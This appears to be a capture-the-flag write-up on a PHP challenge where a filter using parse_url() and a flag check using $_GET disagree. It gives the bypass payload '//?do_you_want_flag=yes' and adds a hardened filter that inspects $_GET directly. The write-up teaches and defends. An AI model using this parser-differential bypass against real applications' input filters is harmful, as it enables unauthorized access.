A bug in PHP's parse_url function when parsing URLs
The challenge code is as follows:
<?php
error_reporting(0);
require __DIR__ . "/flag.php";

// The filter works on its own parse of the request URI ...
$url = urldecode($_SERVER['REQUEST_URI']);
$url_query = parse_url($url, PHP_URL_QUERY);
$params = explode("&", $url_query);
foreach ($params as $param) {
    $idx_equal = strpos($param, "=");
    if ($idx_equal === false) {
        $key = $param;
        $value = "";
    } else {
        $key = substr($param, 0, $idx_equal);
        $value = substr($param, $idx_equal + 1);
    }
    if (strpos($key, "do_you_want_flag") !== false || strpos($value, "yes") !== false) {
        die("no hack");
    }
}

// ... while the flag check reads $_GET, which PHP builds from the raw query string.
if (isset($_GET['do_you_want_flag']) && $_GET['do_you_want_flag'] == "yes") {
    die($flag);
}
highlight_file(__FILE__);
The variable do_you_want_flag must equal yes.
Looking at this challenge, we notice the parse_url function. It has a flaw that can be bypassed with multiple / characters, after which die("no hack") is never executed.
So the payload is simple:
//?do_you_want_flag=yes
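The root cause is a parser differential: the filter inspects what parse_url() extracts from REQUEST_URI, while the flag check reads $_GET, which PHP builds from QUERY_STRING (everything after the first ? of the request target). The script below is an added example, not the challenge's code; it makes both views of a request explicit and shows a filter that reads the same array the sensitive branch uses. It assumes, as the writeup does, that parse_url() rejects the empty authority after // and so yields no query for that request.

```php
<?php
// Added example (not the challenge's own code). Two views of one request
// and a filter that checks the view the flag branch also checks.

// The challenge filter's view: the query as extracted by parse_url().
// When parse_url() cannot parse the URI it returns false, and the original
// loop then has nothing to inspect; this function mirrors that by returning [].
function filter_view(string $request_uri): array
{
    $query = parse_url(urldecode($request_uri), PHP_URL_QUERY);
    if ($query === false || $query === null || $query === "") {
        return [];
    }
    $params = [];
    foreach (explode("&", $query) as $param) {
        $idx = strpos($param, "=");
        $params[] = ($idx === false)
            ? [$param, ""]
            : [substr($param, 0, $idx), substr($param, $idx + 1)];
    }
    return $params;
}

// PHP's own view: $_GET comes from QUERY_STRING, i.e. the text after the
// first '?' of the request target, whatever the path in front of it looks like.
function php_view(string $request_uri): array
{
    $get = [];
    $q = strpos($request_uri, "?");
    if ($q !== false) {
        parse_str(substr($request_uri, $q + 1), $get);
    }
    return $get;
}

// Hardened filter: inspect the array that the flag branch reads, not a
// separate parse that may disagree with it. Array values (a[]=yes) are
// flattened so they are checked too.
function is_blocked(array $get): bool
{
    foreach ($get as $key => $value) {
        $text = is_array($value) ? json_encode($value) : (string) $value;
        if (strpos((string) $key, "do_you_want_flag") !== false
            || strpos($text, "yes") !== false) {
            return true;
        }
    }
    return false;
}

$uri = "//?do_you_want_flag=yes"; // the writeup's request, used here as sample input
var_dump(filter_view($uri), php_view($uri), is_blocked(php_view($uri)));
```

Running it under the same PHP build as the challenge shows the filter's view empty while php_view() still contains the key, and is_blocked() rejecting the request from that second view.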